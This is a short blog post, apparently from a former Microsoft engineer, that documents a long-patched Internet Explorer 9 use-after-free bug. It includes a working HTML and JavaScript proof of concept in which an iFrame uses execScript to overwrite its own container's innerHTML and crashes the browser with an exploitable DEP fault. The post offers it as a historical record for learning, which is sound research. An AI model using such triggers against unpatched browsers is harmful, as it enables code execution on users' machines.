IE9 EoP: iFrame innerHTML Self-Destruction

I found this while experimenting with self-referential DOM mutations. If an iFrame uses execScript to call innerHTML on its own containing element in the parent, it destroys itself mid-execution, leading to an exploitable DEP fault. The innerHTML assignment is the critical ingredient — outerHTML, removeChild, and similar methods do not trigger the same path.

<div id="iFrameContainer">
    <iframe name="iFrame" width="300" height="50" border="1"></iframe>
</div>
<input type="button" onclick="main();" value="CrashMe">

<script language="JavaScript">
function main()
{
    iFrame.execScript('parent.document.getElementById("iFrameContainer").innerHTML = 1');
}
</script>

The innerHTML assignment tears down the iFrame while the iFrame’s own script thread is still running inside execScript. MSHTML ends up executing code at a heap address that has already been freed and reused, triggering a DEP violation. !msec.exploitable classified this as EXPLOITABLE.

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.

Read other posts

< [IE9 EoP: Iterating an iFrame URL Between Feeds and HTML] :: [IE9 DoS: Executing a Method on a Closed Window] >